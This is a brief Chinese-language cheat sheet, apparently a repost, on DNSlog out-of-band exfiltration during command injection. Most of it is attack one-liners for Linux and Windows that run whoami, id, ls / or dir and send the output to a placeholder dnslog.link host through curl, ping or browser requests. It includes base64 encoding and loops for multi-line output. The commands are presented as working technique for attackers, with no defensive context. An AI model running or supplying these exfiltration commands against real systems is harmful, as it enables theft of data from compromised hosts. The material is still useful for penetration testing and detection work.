摘要

linux： curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到內容有空格(換行符等)，就會截斷，只輸出前面的，這時候可以利用編碼來輸出，但有輸出字符數最大限制； curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個輸出的命令，直接使用腳本； for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done; windows：

linux：

curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到內容有空格(換行符等)，就會截斷，只輸出前面的，這時候可以利用編碼來輸出，但有輸出字符數最大限制； curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個輸出的命令，直接使用腳本； for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

windows：

利用HTTP請求： for /F %x in ('whoami') do start http://xxx.dnslog.link/%x 將結果使用默認瀏覽器彈出； 利用DNS請求： 獲取計算機名：for /F "delims=/" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 獲取用戶名：for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能編碼輸出，但利用powershell可以實現； dir有/b參數，不顯示修改日期等信息，只顯示文件名，所以可以彈出； for /F %x in ('dir /b C:/') do start http://xxx.dnslog.link/[%x].jpg

總結

以上是生活随笔為你收集整理的linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。